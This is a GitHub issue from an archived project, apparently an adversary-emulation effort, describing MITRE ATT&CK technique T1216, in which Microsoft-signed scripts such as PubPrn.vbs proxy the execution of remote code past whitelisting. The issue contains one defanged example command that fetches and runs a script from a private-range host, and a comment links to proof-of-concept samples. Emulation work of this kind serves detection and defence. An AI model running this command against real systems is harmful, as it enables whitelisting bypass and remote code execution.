Skip to content
This repository has been archived by the owner on Apr 9, 2024. It is now read-only.

T1216W - Signed Script Proxy Execution #26

Open
daniel-infosec opened this issue May 2, 2019 · 1 comment
Open

T1216W - Signed Script Proxy Execution #26

daniel-infosec opened this issue May 2, 2019 · 1 comment
Labels
enhancement New feature or request

Comments

@daniel-infosec
Copy link
Contributor

Description

Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.

PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site. [1] Example command: cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png

There are several other signed scripts that may be used in a similar manner. [2]

@daniel-infosec daniel-infosec added the enhancement New feature or request label May 2, 2019
@jabra-
Copy link

jabra- commented May 3, 2019

blog post with sample pocs: https://p16.praetorian.com/blog/signed-scripts-proxy-execution-t1216

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
enhancement New feature or request
Projects
None yet
Development

No branches or pull requests

2 participants